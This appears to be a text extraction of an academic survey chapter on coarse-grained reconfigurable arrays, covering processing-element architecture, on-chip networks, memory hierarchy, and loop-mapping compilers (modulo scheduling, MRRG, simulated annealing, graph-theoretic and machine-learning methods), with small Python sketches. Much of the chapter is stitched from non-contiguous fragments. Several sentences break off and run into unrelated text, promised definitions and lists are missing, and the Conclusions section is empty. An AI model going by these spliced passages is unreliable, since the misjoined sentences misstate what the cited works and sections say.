Fig. 1 A representative CGRA: a 4 × 4 array of processing elements (PEs) connected through switches to each other and to the on-chip data memory, where each PE contains a functional unit (FU), a register file (RF), a configuration memory, and an output port
Historical Context
While Moore’s law was responsible for the sustained increase in clock frequency, processor performance improved further due to several micro-architectural innovations, including the processor pipeline, out-of-order execution, speculation, and the cache memory hierarchy, among others. These advancements enabled the processor to extract instruction-level parallelism (ILP), thereby boosting the critical instructions-per-cycle (IPC) metric (Hennessy and Patterson 2011). More importantly, as the ILP was extracted transparently by the underlying architecture from single-threaded programs, software developers enjoyed the performance benefit without any additional effort. Together, the growth in clock frequency and IPC ensured the relentless gain in processor performance spanning over three decades. However, this performance growth has come to an end with the power wall (due to the breakdown of Dennard scaling), the ILP wall, and the memory wall (Patterson et al. 2006). Thus, computing systems made the irreversible transition in the early 2000s toward multi- and many-core architectures to gainfully employ the growing number of transistors supported by Moore’s law and to exploit thread-level parallelism (TLP) instead of ILP. However, simply increasing the core count in multi-cores is no longer tenable, as the sequential fragment limits the speedup of the entire application according to Amdahl’s law (Amdahl 1967).
Against this backdrop, domain-specific accelerators (Dally et al. 2020; Jouppi et al. 2017; Ghorpade et al. 2012; Rashid et al. 2019) specialized for a particular task, such as deep neural networks, image/video processing, and encryption, have become prevalent from tiny Internet-of-Things (IoT) devices to datacenters.
Current system-on-chips (SoCs) include a number of special-purpose accelerators.
Shao et al. (2015) analyzed die photos from three generations of Apple’s SoCs: A6
(iPhone 5), A7 (iPhone 5S), and A8 (iPhone 6) to show that consistently more than
half of the die area is dedicated to application-specific hardware accelerators and
et al. 2021), Samsung Reconfigurable Processor (Suh et al. 2012), Renesas Dynam-
ically Reconfigurable Processor (DRP) (Fujii et al. 2018), and Intel Configurable
Spatial Accelerator (Fleming et al. 2020). These CGRAs have more processing
elements and complex architectures compared to the original designs and thus
require more compilation effort to efficiently utilize the hardware resources.
There have been many works on domain-specific spatial accelerators in the recent literature (Chen et al. 2019; Jouppi et al. 2017; Lu et al. 2017; Tu et al. 2017; Kwong and Chandrakasan 2011; Yoo et al. 2012). These accelerators target applications in specific domains such as deep neural networks, image analysis, and signal processing. The micro-architecture of domain-specific spatial accelerators shares many similarities with CGRAs. Like CGRAs, most of the domain-specific accelerators have an array of processing elements connected in a two-dimensional grid. However, the processing elements have limited and specific computation capability, and the interconnection network is designed to support a specific dataflow and is not fully reconfigurable. For example, in the Google Tensor Processing Unit (TPU), the processing elements only support multiply-and-accumulate operations, while the interconnection network supports a systolic dataflow for matrix multiplication (Jouppi et al. 2017). These domain-specific accelerators can be viewed as different instantiations of a domain-agnostic CGRA accelerator that can be configured in software to support any dataflow and computation.
Architecture: A Landscape of Modern CGRA
In this section, we provide a brief overview of the basic CGRA architecture and its variations. For a detailed survey of CGRA architectures, readers can refer to Liu et al. (2019) and Podobas et al. (2020).
Heterogeneous CGRA In a heterogeneous CGRA, the PEs can have different functionalities. If a CGRA targets application kernels from specific domains, special PEs can be useful, such as ones supporting multiply-accumulate (MAC) operations in machine learning. However, if these special PEs are costly in terms of area or power, the CGRA can include the special functionality in only some of the PEs. Most CGRAs provide heterogeneity in terms of memory access functionality. For example, in the CGRA of Fig. 1, it is not necessary to let all the PEs access the on-chip data memory: the latency of a data memory access is generally much longer than that of a computation, and the scratchpad memory (SPM) also has a limited number of ports, restricting the number of parallel accesses. Hence, usually only the PEs at the boundary can access the SPM. Another example is the RAPID architecture (Venkataramani et al. 2019), which has a 1D array of special function units (SFUs) alongside a 2D array of PEs. The SFUs support FP32 operations, while the other PEs support only integer operations.
Spatial CGRA A CGRA can reconfigure the PEs for different operations and routing every cycle. Each PE is associated with a configuration memory, which stores a limited number of configuration words, one per cycle. The PE rotates, or loops, through these configuration words and accordingly sets the operation of the FU and the routing for the switches and the RF. A special case is a CGRA with only one configuration word, referred to as a spatial CGRA. A spatial CGRA can reduce area, power, and cycle time (giving a higher clock frequency), as there is no reconfiguration delay involved. The area and power of the configuration memory are considerable for CGRAs: in Karunaratne et al. (2018), the power consumption of a 4 KB configuration memory in a 4 × 4 CGRA is around 40% of the whole chip power. A spatial CGRA is therefore more energy-efficient than traditional CGRAs. However, it gives up the advantage of the temporal dimension and essentially reduces to an FPGA with coarse-grained reconfigurable units. Note that limited configuration memory, while area- and energy-efficient, may not accommodate large kernels and may require loop partitioning with runtime configuration reloading to accelerate such kernels.
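To make the temporal versus spatial distinction concrete, here is a minimal Python sketch (with illustrative field names, not drawn from any particular CGRA) of a PE rotating through its configuration words each cycle; a spatial CGRA is the special case of a single configuration word:

```python
from dataclasses import dataclass

@dataclass
class ConfigWord:
    fu_op: str       # operation executed by the functional unit, e.g., "add"
    mux_sel: int     # switch/RF routing selection feeding the FU
    rf_write: bool   # whether the FU result is written back to the RF

class PE:
    """A PE loops through its configuration words, one per cycle."""
    def __init__(self, config_words):
        self.config = config_words
        self.ii = len(config_words)  # II = 1 corresponds to a spatial CGRA

    def config_at(self, cycle):
        return self.config[cycle % self.ii]  # modulo rotation

# Temporal PE alternating between two operations (II = 2)
temporal_pe = PE([ConfigWord("add", 0, True), ConfigWord("mul", 1, False)])
# Spatial PE: one configuration word fixed for the entire execution
spatial_pe = PE([ConfigWord("mac", 0, True)])

for t in range(4):
    print(t, temporal_pe.config_at(t).fu_op, spatial_pe.config_at(t).fu_op)
```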
On-chip network The on-chip network connects the PEs to route data. In each PE, there are routing paths from the input ports to the output ports, and data can be stored in the register file while waiting for processing or further routing. The most common network is the neighbor-to-neighbor (N2N) connection: each PE is connected to its neighboring PEs, and neighbors can be reached in one cycle, while routing to distant PEs goes through intermediate PEs and takes multiple cycles. The simple N2N network, however, provides very limited interconnection on the chip. It takes tremendous compilation effort to achieve good speedup when accelerating kernels with complex data dependencies, and even then the speedup can be limited.
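As a minimal illustration of the N2N cost model (a sketch under the assumption that intermediate PEs are free to forward data), the best-case routing latency between two PEs is their Manhattan distance, one hop per cycle:

```python
def n2n_route_cycles(src, dst):
    """Minimum routing latency (cycles) between two PEs in a
    neighbor-to-neighbor mesh: one hop per cycle, assuming the
    intermediate PEs are free to forward the data."""
    (r1, c1), (r2, c2) = src, dst          # (row, column) PE coordinates
    return abs(r1 - r2) + abs(c1 - c2)

assert n2n_route_cycles((0, 0), (0, 1)) == 1   # neighbors: one cycle
assert n2n_route_cycles((0, 0), (3, 3)) == 6   # distant PEs: multiple cycles
```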
Memory hierarchy Typically, the CGRA memory hierarchy consists of two types
of memory: data memory to hold input, output, and intermediate data and the
configuration memory to hold the configuration directives for the FU, RF, and the
switches.
Fig. 4 On-chip memory hierarchy of CGRA loosely coupled with host CPU
Figure 4 shows CGRA data memory with four memory banks where only the
boundary PEs on the left side have access to the data memory. Some architectures
perform the load/store address generation within the PE array, while others have
specialized hardware address generation units (Wijerathne et al. 2019). Apart from
global data memory, some CGRA architectures use shared register files to hold intermediate data. These register files are shared between a subset of PEs and provide an alternative to the on-chip network for communication within those subsets of PEs.
The CGRA configuration memory, also referred to as context/instruction memory, holds the directives for CGRA execution each cycle, including the operations to be executed by the PEs and the routing configurations for the crossbar switches. As CGRAs are specifically used for accelerating loop kernels, the same sequence of configurations is repeated over a fixed number of cycles. The configurations are loaded into the configuration memory before the CGRA execution starts. The configuration memory can be either centralized (global) or decentralized (local), where each PE has a separate configuration memory. Even in a decentralized setting, the configurations for the PEs are fetched and decoded in a lockstep manner. Therefore, the program counters of all the PEs have the same value even though they have different configurations.
Some CGRAs are tightly coupled with the main processor, where the CGRA is a part of the main CPU. For example, the ADRES (Mei et al. 2003a) CGRA is tightly coupled with the main processor, where the top row of the PE array is a VLIW processor that acts as the main processor. Figure 4 shows a loosely coupled system where the CGRA is attached as an independent accelerator; the MorphoSys CGRA (Singh et al. 2000) is an example of a loosely coupled CGRA. Loosely coupled CGRAs offer more flexibility in the design phase as they can be designed independently. In a loosely coupled system, both the CPU and the CGRA can execute code in parallel in a non-blocking manner, whereas a tightly coupled system typically cannot execute code in parallel on the CPU and the CGRA as they share the same resources. However, the data transfer overheads are higher in a loosely coupled system than in a tightly coupled one.
Compilation for CGRAs
Given a loop from an application and a CGRA architecture, the goal of compilation is to map the loop onto the CGRA (i.e., generate the configurations for a fixed number of cycles) so as to maximize the throughput. In the CGRA world, this compilation step is generally referred to as mapping. The loop is represented as a dataflow graph (DFG), where the nodes represent the operations and the edges represent the dependencies between the nodes.
Figure 5c shows a possible mapping of the DFG in Fig. 5b onto the CGRA in Fig. 5a. For the sake of convenience, the 2 × 2 CGRA in Fig. 5a has been drawn as a linear array. The mapping has three parts: prologue, steady-state kernel, and epilogue. The prologue and epilogue are executed only once, at the start and end of the loop execution. The steady-state kernel is repeated and includes all the operations from one or more iterations. The schedule length of the kernel is called the initiation interval (II) and indicates the number of cycles between the initiations of consecutive loop iterations. For a loop with a large number of iterations, the execution time is dominated by the II value.
Fig. 5 2 × 2 CGRA, a DFG (dataflow graph), and the mapping. (a) 2 × 2 CGRA. (b) DFG example. (c) DFG mapping example showing the prologue, steady-state kernel (II = 2), and epilogue across PE0–PE3
In the mapping of Fig. 5c, II = 2. Notice that node n5 of the first loop iteration executes in the same cycle as n1 and n2 from the second loop iteration. Hence, the CGRA can start a new loop iteration every two cycles, leading to an II value of two. The routing is done through the network among the PEs. This figure shows an abstract mapping for convenience; a real mapping would include the detailed routing configuration at each PE.
Given a DFG and a CGRA, the mapper first calculates the minimum initiation interval (MII), which is the maximum of the resource-minimal II and the recurrence-minimal II. The resource MII depends on the number of PEs and the number of DFG nodes (assuming one PE can process one DFG node per cycle); hence, the resource MII cannot be less than the number of DFG nodes divided by the number of PEs. The recurrence MII is determined by the dependencies across loop iterations. Let us assume that we have an operation a[i] = a[i − 1] × b[i]. The operation of iteration i must wait for the result of the operation of the previous iteration i − 1. The recurrence MII can be calculated by traversing the DFG.
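As a concrete sketch (not the authors' algorithm), the function below computes this lower bound under simplifying assumptions (unit-latency operations, distance-1 recurrences, one DFG node per PE per cycle), using networkx only to enumerate dependence cycles:

```python
import math
import networkx as nx  # assumed available for cycle enumeration

def minimum_ii(dfg: nx.DiGraph, num_pes: int) -> int:
    """MII = max(resource-minimal II, recurrence-minimal II), assuming
    unit-latency operations and distance-1 inter-iteration dependences."""
    res_mii = math.ceil(dfg.number_of_nodes() / num_pes)
    # Recurrence MII: the longest dependence cycle found by traversing the DFG.
    rec_mii = max((len(cyc) for cyc in nx.simple_cycles(dfg)), default=0)
    return max(res_mii, rec_mii)

# a[i] = a[i-1] * b[i] expressed as a 3-operation dependence cycle:
g = nx.DiGraph([("load_a", "mul"), ("mul", "store_a"), ("store_a", "load_a")])
g.add_edge("load_b", "mul")
print(minimum_ii(g, num_pes=4))  # resource MII = 1, recurrence MII = 3 -> 3
```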
Mapping a compute-intensive loop kernel of an application to CGRAs using modulo scheduling was first discussed in the DRESC compiler (Mei et al. 2003b). The algorithm starts with an II equal to the maximum of the resource-minimal II and the recurrence-minimal II and attempts to schedule the loop. If it fails, it retries with successively larger II values.
Modulo Routing Resource Graph (MRRG) Mei et al. (2003b) proposed the MRRG, which represents the resources and the routing for a time-extended CGRA. The nodes in the MRRG represent the ports of the register file, the on-chip network, the ALU inside a PE, etc. The edges are the connections among the CGRA components represented as nodes. The MRRG is a directed graph G_II, where II corresponds to the initiation interval. Given a graph G, let us denote the vertex set by V(G) and the edge set by E(G). Each node v ∈ V(G_II) is a tuple (n, t), where n refers to a resource in the CGRA and t is the cycle (0 ≤ t ≤ II − 1). Let e = (u, v) ∈ E(G_II) be an edge where u = (m, t) and v = (n, t + 1). Then the edge e represents a connection from resource m in cycle t to resource n in cycle t + 1. In general, if resource m is connected to resource n in the CGRA, then node u = (m, t) is connected to node v = (n, t + 1) for t ≥ 0.
Figure 6 shows the MRRG corresponding to the CGRA in Fig. 5a when the II is 2. The resources of the 2 × 2 CGRA are replicated every cycle along the time axis. In modulo scheduling, if a node v = (n, t) in the MRRG becomes occupied, then all the nodes v = (n, t + k × II) (where k > 0) are also occupied. For example, in Fig. 5c, PE0 is occupied by node n1 at cycle 0 and the II is 2; thus, the node occupies PE0 every 2k cycles. Hence, after cycle 1, the configuration of cycle 0 is used to reconfigure the fabric, as the II is 2 and the configuration has two items. Thus, there are wrap-around edges from the second item back to the first one, as cycle 3 uses the first configuration item. These edges represent hardware resource connections along the time axis.
Fig. 6 The MRRG corresponding to the 2 × 2 CGRA of Fig. 5a with II = 2; the resources are replicated along the time axis
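A minimal construction of such an MRRG is sketched below; as a simplification, it treats each PE as a single routing resource (a full MRRG would model FU, RF ports, and switch ports as separate nodes) and shows how the wrap-around edges arise from the modulo arithmetic:

```python
def build_mrrg(resources, connections, ii):
    """Modulo Routing Resource Graph: one node (n, t) per CGRA resource n
    and cycle t in [0, II); an edge (m, t) -> (n, (t+1) % II) for every
    hardware connection m -> n. The modulo wraps the last cycle back to
    the first, mirroring the reuse of the II configuration words."""
    nodes = [(n, t) for n in resources for t in range(ii)]
    edges = [((m, t), (n, (t + 1) % ii))
             for (m, n) in connections for t in range(ii)]
    return nodes, edges

# The 2x2 CGRA of Fig. 5a drawn as a linear array, with II = 2 (cf. Fig. 6)
pes = ["PE0", "PE1", "PE2", "PE3"]
links = [(a, b) for a, b in zip(pes, pes[1:])] + \
        [(b, a) for a, b in zip(pes, pes[1:])]
nodes, edges = build_mrrg(pes, links, ii=2)
print(len(nodes), len(edges))  # 8 nodes, 12 edges
```

Because nodes are defined modulo II, occupying (n, t) automatically accounts for every cycle t + k × II, which is exactly the modulo-scheduling constraint stated above.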
Heuristic Approaches
The heuristic approaches propose customized solutions for the CGRA mapping
problem.
Simulated Annealing
Meta-heuristics are problem-independent approaches that treat the architectural elements as black boxes. Simulated annealing is one of the most popular meta-heuristic methods. Here, we introduce the usage of simulated annealing in CGRA mapping as proposed in the DRESC compiler (Mei et al. 2003b). For a target II value, the algorithm first generates an initial schedule satisfying the dependence constraints but with possibly over-subscribed resources. For example, more than one operation might be scheduled on the same functional unit in the same cycle. The algorithm then iteratively reduces the resource overuse via simulated annealing, exploring different placement and routing options until a valid placement and routing of all operations and data dependencies is found. The cost function used during the simulated annealing is based on the total routing cost, i.e., the combined resource consumption of all the placed operations and the routed data dependencies. In this technique, a huge number of possible routes are evaluated. As a result, the technique has a long convergence time, especially for large dataflow graphs.
Routing through the register files and the register allocation problem are further explored in De Sutter et al. (2008), which extends the work in Mei et al. (2003b). Register allocation is achieved by constraining the register usage during the simulated annealing place-and-route process. The imposed constraint is adopted from the meeting graph (Eisenbeis et al. 1995) for solving cyclic register allocation for loops in VLIW processors. In the post-routing phase, the registers are allocated by finding a Hamiltonian circuit in the meeting graph, which is solved as a traveling salesman problem (De Sutter et al. 2008). This technique is specifically designed for CGRAs with rotating register files. Hatanaka and Bagherzadeh (2007) and CGRA-ME (Chin et al. 2017) follow the simulated annealing framework but aim at finding better cost functions for over-used resources.
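The skeleton below illustrates the general shape of such an annealing loop; it is a hedged sketch rather than DRESC itself, with the caller supplying the slot set of the time-extended CGRA and a cost function that penalizes over-subscribed resources and routing usage (cost 0 meaning a legal mapping):

```python
import math
import random

def anneal_mapping(ops, slots, cost, t0=10.0, alpha=0.95, moves=200):
    """Simulated-annealing placement skeleton: start from a random (possibly
    over-subscribed) placement, move one operation at a time, and accept
    uphill moves with a probability that decays with the temperature."""
    place = {op: random.choice(slots) for op in ops}
    cur = cost(place)
    best, best_cost = dict(place), cur
    temp = t0
    while temp > 0.01 and best_cost > 0:   # cost 0 = legal, fully routed
        for _ in range(moves):
            op = random.choice(ops)
            old = place[op]
            place[op] = random.choice(slots)
            new = cost(place)
            if new <= cur or random.random() < math.exp((cur - new) / temp):
                cur = new                  # accept the move
                if new < best_cost:
                    best, best_cost = dict(place), new
            else:
                place[op] = old            # reject: restore the old slot
        temp *= alpha                      # geometric cooling schedule
    return best, best_cost
```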
Fig. 7 Node-centric (left) versus edge-centric (right) modulo scheduling (Park et al. 2008a)
routing the edge. The router searches for an empty slot that can execute the target operation. Once a suitable slot is found, the mapper places the operation and routes the remaining edges.
Figure 7c shows the same example as Fig. 7b, with the consumer mapped using an edge-centric approach. The scheduler tries to route the edge from P1 to C first, instead of placing operation C directly. When an empty slot is found, the scheduler temporarily places the target operation and checks whether there are other edges connected to the consumer; if so, it recursively routes those edges. For example, when the router visits slot (PE2,1), it temporarily places C there and recursively calls the router function to route the edge from P2 to C. When it fails to route the edge from P2 to C, routing resumes from slot (PE2,1), not from P1, and a solution is eventually found at slot (PE3,4).
In general, an edge-centric approach can find a solution faster and achieve better-quality mappings compared to a node-centric approach. However, it has a greedy nature in that it optimizes for a single edge at a time, and the solution can easily fall into local minima. There is no search mechanism in the scheduler at the operation level, and every decision made in each step is final. This problem can be addressed by employing intelligent routing cost metrics as priorities. The quality of a mapping using specific priorities highly depends on efficient heuristics for assigning these priority values to both the operations and the resources.
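A simplified, self-contained rendition of this edge-centric placement step is sketched below; for brevity, the reachability test ignores the occupancy of intermediate routing slots, which a real router such as that of Park et al. (2008a) accounts for:

```python
from collections import deque

def bfs_slots(adj, start):
    """Yield slots in increasing routing distance from `start`."""
    seen, queue = {start}, deque([start])
    while queue:
        slot = queue.popleft()
        yield slot
        for nxt in adj.get(slot, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)

def place_edge_centric(adj, producer_slots, can_execute, occupied):
    """Route the first producer edge outward and place the consumer at the
    first free, capable slot; tentatively commit, then check the remaining
    producer edges, backtracking and resuming the search on failure."""
    first, rest = producer_slots[0], producer_slots[1:]
    for slot in bfs_slots(adj, first):
        if slot in occupied or not can_execute(slot):
            continue
        occupied.add(slot)                          # tentative placement
        if all(slot in bfs_slots(adj, src) for src in rest):
            return slot                             # all edges routable: done
        occupied.remove(slot)                       # resume from this point
    return None                                     # mapping attempt failed
```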
List Scheduling
A priority-based list scheduling heuristic is used in the mapping algorithm of Bansal et al. (2003) to map data-dependent operations in the kernel onto spatially close PEs in the CGRA. Each operation in the kernel is mapped onto a PE considering the operation priority and the ability to route data from the already-mapped parent operations. The algorithm maintains a PE list based on a topology traversal order and an operation list based on scheduling priority. The topology traversal order is the order in which PEs are visited while mapping operations to PEs; the experimental results show that a spiral traversal order performs best. The operation list is ordered by a scheduling priority that gives preference to operations on the longest data dependency paths. The operation with the highest priority is mapped on the next available PE in the PE list if there is a valid route from the already-mapped parent operations. Scheduling is done on a cycle-by-cycle basis: each cycle, the algorithm schedules operations on each PE and increments the cycle when the PE list is exhausted. This process continues until all the operations in the kernel have been scheduled. Unfortunately, list scheduling algorithms do not produce a software-pipelined schedule and are thus unable to exploit inter-iteration parallelism.
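The sketch below captures the cycle-by-cycle structure described above (a priority-ordered operation list and a PE list in a fixed traversal order); it assumes an acyclic DFG with unit-latency operations and, as noted, yields a non-pipelined schedule:

```python
def list_schedule(preds, priority, pe_order):
    """Priority-based list scheduling: each cycle, walk the PE list and
    place the highest-priority ready operation (all parents already done)
    on the next PE; advance the cycle when the PE list is exhausted."""
    pending = sorted(preds, key=priority, reverse=True)  # operation list
    schedule, done, cycle = {}, set(), 0
    while pending:
        placed_now = []
        for pe in pe_order:                 # e.g., spiral traversal order
            for op in pending:
                if all(p in done for p in preds[op]):
                    schedule[op] = (pe, cycle)
                    pending.remove(op)
                    placed_now.append(op)
                    break
        done.update(placed_now)             # results visible next cycle
        cycle += 1
    return schedule

preds = {"a": [], "b": [], "c": ["a", "b"]}       # c depends on a and b
depth = {"a": 1, "b": 1, "c": 0}                  # longest-path priority
print(list_schedule(preds, depth.get, ["PE0", "PE1"]))
# {'a': ('PE0', 0), 'b': ('PE1', 0), 'c': ('PE0', 1)}
```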
Evolutionary Algorithm
The mapping approach in Lee et al. (2011) presents a fast heuristic using a
quantum-inspired evolutionary algorithm. This evolutionary algorithm uses
an initial solution obtained from list scheduling as a starting point. The
algorithm uses Q-Bit encoding to represent the hundreds of possible mapping
results and evaluates each case to choose the best solution that satisfies the
Machine Learning
A reinforcement-learning-based mapping approach for CGRAs has been proposed in RLMap (Liu et al. 2018). The CGRA mapping problem is formulated as an agent in reinforcement learning. Each mapping state is represented as a distinct image that captures operation placement and inter-PE routing. The agent action is defined as the interchange of operations on neighboring PEs, to keep the action space small. The reward function is defined based on a cost function that captures interconnect power requirements, utilized compute PEs, routing PEs, and empty PEs, and helps the agent obtain valid and high-quality mappings in terms of power, area, and performance.
Inspired by the progress in deep learning, Yin et al. (2017a) proposed DFGNet, a convolutional neural-network-based mapping approach. They present a dual-input neural network to capture the kernel DFG and the CGRA architecture, translating the CGRA mapping problem into an image-based classification problem. The input DFG is represented as an adjacency matrix, and another matrix represents the CGRA architecture state. The neural network consists of convolutional, max pooling, concatenate, and fully connected layers. The issue with any deep learning method for application mapping on CGRAs is the difficulty of obtaining the abundant training data required for such approaches.
CGRAs differ in their networks and PE functions. Existing compilers (Wang et al. 2019; Hamzeh et al. 2013; Dave et al. 2018) usually leverage special characteristics of the architecture to generate quality mappings. These compilers, however, are usually hand-crafted, which is challenging from the time-to-market perspective. Li et al. (2022) proposed a portable framework, LISA, to map DFGs onto diverse CGRAs. LISA uses a graph neural network (GNN) to analyze the dataflow graph (DFG) and derive labels that describe how the DFG should be mapped, e.g., the estimated routing resource required by an edge and the predicted mapping distance between DFG nodes. With trained GNNs, these labels can reflect characteristics of the accelerator.
Graph-Theory-Inspired Techniques
Many CGRA mapping approaches use graph theory concepts to formulate the
CGRA mapping problem. Those approaches transform the CGRA mapping problem
into well-known graph-theoretic formulations and leverage the existing techniques
to solve the problem. This section categorizes the graph-theory-inspired mapping
techniques based on the graph theory formalism they use. We also discuss, in more
detail, prominent CGRA mapping techniques that correspond to each formalization.
Table 1 summarizes different aspects of five such notable works.
The following graph theory concepts are widely used to formalize and solve the CGRA application mapping problem:
1. Subgraph homeomorphism
2. Graph epimorphism
3. Graph minor
4. Compatibility graph
5. Graph drawing
To understand the above graph theory concepts, we first need to present a few related definitions. Therefore, let us begin with the definitions of graph isomorphism, graph subdivision, graph homeomorphism, and induced subgraph.
Table 1 Notable works using graph theory concepts for the CGRA mapping problem

Work | Graph theory concept | Solution | What is new?
Alle et al. (2008) | Homeomorphism | Greedy algorithm for transformation | Mapping DFG substructures
EpiMap (Hamzeh et al. 2012) | Epimorphism | Heuristic-based search | Recomputation to solve the out-degree problem
Graph Minor (Chen and Mitra 2014) | Graph minor | Tree search method | Allows route sharing
REGIMap (Hamzeh et al. 2013) | Compatibility graph | Finding a max clique | Allows both route sharing and recomputation
SPKM (Yoon et al. 2009) | Graph drawing | Split-and-push approach | Supports heterogeneous architectures
Two graphs are isomorphic when both graphs contain the same number of
vertices connected in the same way. Figure 8 shows two isomorphic graphs. Graph
isomorphism is an equivalence relation on directed graphs.
Subgraph-Homeomorphism-Based Techniques
The formal definition of subgraph homeomorphism is as follows:
Fig. 11 Subgraph homeomorphism formulation of the CGRA mapping problem. (a) DFG. (b) CGRA. (c) MRRG
Graph-Epimorphism-Based Technique
Graph epimorphism is defined based on graph homomorphism. Therefore, let
us first look at the definition of graph homomorphism. A graph homomor-
phism defines a mapping between two graphs in which adjacent vertices in
the first graph are mapped to adjacent vertices in the second graph. Unlike
isomorphism, homomorphism can be from a bigger to a smaller graph. The
formal definition of a homomorphism is as follows:
Fig. 12 A valid mapping without using recomputation (left) versus with recomputation (right) in
EpiMap (Hamzeh et al. 2012)
Graph-Minor-Based Technique
• The graphs {φ(v) | v ∈ V} are mutually vertex disjoint, and the edges {φ(e) | e ∈ E} are pairwise distinct.
• If e = (u, v) ∈ E, the edge φ(e) connects φ(u) with φ(v).
Graph Minor (Chen and Mitra 2014) models the CGRA mapping problem as a graph minor containment problem that can explicitly model route sharing. As explained in the definition, a graph H is a minor of a graph G if H can be obtained from a subgraph of G by a (possibly empty) sequence of edge contractions (Robertson and Seymour 1990). The graph minor relation is originally defined for undirected graphs, but the authors of Chen and Mitra (2014) adapt the definition to directed graphs for CGRA mapping. In this context, we need to test whether the DFG is a minor of the MRRG, where the edges to be contracted represent the routing paths in the MRRG. The mapping algorithm is inspired by the tree search method, which is widely used to solve graph matching problems. Unlike edge subdivision (or its reverse operation, smoothing), edge contractions are not restricted to simple paths; thus, the graph minor formalism naturally allows for route sharing. Figure 13 shows the difference between mappings under the graph minor approach (Fig. 13d) and the subgraph homeomorphism approach (Fig. 13c). The number of routing nodes is reduced from 3 (in the subgraph homeomorphism mapping) to 2 (in the graph minor mapping) through route sharing.
Compatibility-Graph-Based Technique
REGIMap (Hamzeh et al. 2013) presents a general formulation of the problem of mapping a kernel on the CGRA while using its registers to minimize the II. The formulation partitions the problem into a scheduling problem and an integrated placement and register allocation problem. REGIMap first creates a compatibility graph, a subgraph of the product of the DFG G and the MRRG H. The vertices of the compatibility graph denote operation–resource pairs, which represent possible mappings; the edges denote the compatibility of two such mapping pairs. The mapping problem is reduced to finding the largest clique in the compatibility graph under the constraints of the register resources. An efficient, constructive heuristic is then used to solve this problem.
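A hedged sketch of the compatibility-graph construction follows; the conflicts predicate stands in for REGIMap's detailed timing, routing, and register constraints, and clique enumeration via networkx is shown for illustration only, since REGIMap itself uses a constructive heuristic:

```python
import networkx as nx
from itertools import combinations

def compatibility_graph(dfg_ops, mrrg_slots, conflicts):
    """Vertices are (operation, resource) pairs; an edge joins two pairs
    that could coexist in one mapping (distinct ops, distinct resources,
    and no constraint violation reported by `conflicts`)."""
    g = nx.Graph()
    pairs = [(op, slot) for op in dfg_ops for slot in mrrg_slots]
    g.add_nodes_from(pairs)
    for p1, p2 in combinations(pairs, 2):
        (o1, s1), (o2, s2) = p1, p2
        if o1 != o2 and s1 != s2 and not conflicts(p1, p2):
            g.add_edge(p1, p2)
    return g

# A clique containing one vertex per DFG operation is a complete,
# conflict-free mapping; maximal cliques can be enumerated (at worst
# exponentially) with nx.find_cliques(g).
```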
Fig. 13 Subgraph homeomorphism (left) versus graph minor formulation (Chen and Mitra 2014)
(right) of CGRA mapping problem
Graph-Drawing-Based Technique
SPKM (Yoon et al. 2009) adopts the split-and-push technique (Di Battista et al. 1998) for planar graph drawing and focuses on spatial mappings for CGRAs. The mapping in SPKM starts from an initial drawing where all DFG nodes reside in the same group; one group represents a single processing element. The group is then split into two, and a set of nodes is pushed to the newly generated group. The split process continues until each group contains only one node, representing a one-to-one mapping from the DFG to the planar resource graph of the CGRA.
Fig. 14 Memory-aware loop mapping on CGRA. (a) DFG of the array-addition loop kernel. (b)
Mapping of array-addition loop kernel
are interdependent tasks. The host CPU manages the data movement using a DMA controller based on the data placement decided by the compiler.
This section discusses compiler-based solutions for challenges related to data access in CGRAs.
Memory-Aware Compilation
An effective memory-aware compilation strategy should:
multiple times to support imperfect nested loops when only the innermost loop body
is mapped to the CGRA. Multiple invocations lead to overheads, including pipeline
filling/draining and the initialization of loop variables and pipeline parameters on
the CGRA.
Mapping Approaches
We categorize existing works for nested loop mapping based on their
approach.
Loop Flattening Based Loop flattening can convert an imperfect loop nest into a single loop that can be executed in a single invocation. However, loop flattening comes with the overhead of increased code size. Lee et al. (2014) argue that the overhead from the increased code size is lower than the overhead of multiple invocations. To limit the negative impact of loop flattening, they combine loop fission with flattening and introduce a few specialized operations in the CGRA PEs, called nested iterators, extended accumulators, and periodic stores.
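To make the transformation concrete, the following sketch flattens an imperfect two-level nest (the accumulator reset sits outside the innermost loop) into a single loop of N × M iterations; the guards that replay the outer-loop-only work correspond to the overhead that those specialized operations are designed to amortize:

```python
N, M = 4, 8
a = [[i * M + j for j in range(M)] for i in range(N)]

# Imperfect nest: the accumulator reset is outer-loop-only code.
row_sum = [0] * N
for i in range(N):
    acc = 0                      # statement outside the innermost loop
    for j in range(M):
        acc += a[i][j]
    row_sum[i] = acc

# Flattened: a single loop, hence a single CGRA invocation.
flat_sum = [0] * N
for k in range(N * M):
    i, j = divmod(k, M)          # "nested iterator" recovers (i, j) from k
    if j == 0:
        acc = 0                  # guard replays the outer-loop-only work
    acc += a[i][j]
    if j == M - 1:
        flat_sum[i] = acc        # periodic store at the end of each row

assert flat_sum == row_sum
```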
Application-Level Mapping
An application usually has several kernels, each of which can be sequential code, a single loop, multiple loops, or any combination of these. A CGRA can reconfigure the functionality of the PEs and the routing of the on-chip network to accelerate any kernel. Application-specific integrated circuits (ASICs) always target specific kernels and lose the flexibility to process other kernels. A field-programmable gate array (FPGA) can be reconfigured to accelerate any kernel; due to the time cost of reconfiguration, however, an FPGA cannot change its configuration frequently to execute different kernels. When mapping an application, an FPGA usually needs to map all the target kernels spatially, which is limited by the available area, and cannot do a spatio-temporal mapping. In contrast, a CGRA can reconfigure the PEs and the on-chip network every cycle, thus enabling a spatio-temporal mapping.
Fig. 16 Comparison between spatial and spatio-temporal mapping. (a) Spatial mapping. (b) Spatio-temporal mapping
mapping regular highly parallel kernels, as mentioned in the nested loop mapping
section (Wijerathne et al. 2021a,b). Similar approaches of exploring multi-level
parallelism have been studied in the context of FPGAs (Zhong et al. 2014, 2016,
2017).
Conclusions
References
Ahn M, Yoon JW, Paek Y, Kim Y, Kiemb M, Choi K (2006) A spatial mapping algorithm for
heterogeneous coarse-grained reconfigurable architectures. In: Proceedings of the Conference
on Design, Automation and Test in Europe: Proceedings. European Design and Automation
Association, pp 363–368
Alle M, Varadarajan K, Ramesh RC, Nimmy J, Fell A, Rao A, Nandy S, Narayan R (2008)
Synthesis of application accelerators on runtime reconfigurable hardware. In: 2008 International
Conference on Application-Specific Systems, Architectures and Processors. IEEE, Munich,
Germany, pp 13–180
Amdahl GM (1967) Validity of the single processor approach to achieving large scale computing
capabilities. In: Proceedings of the Spring Joint Computer Conference, 18–20 Apr, 1967,
pp 483–485
Bandara TK, Wijerathne D, Mitra T, Peh LS (2022) REVAMP: a systematic framework for
heterogeneous CGRA realization. In: 27th ACM International Conference on Architectural
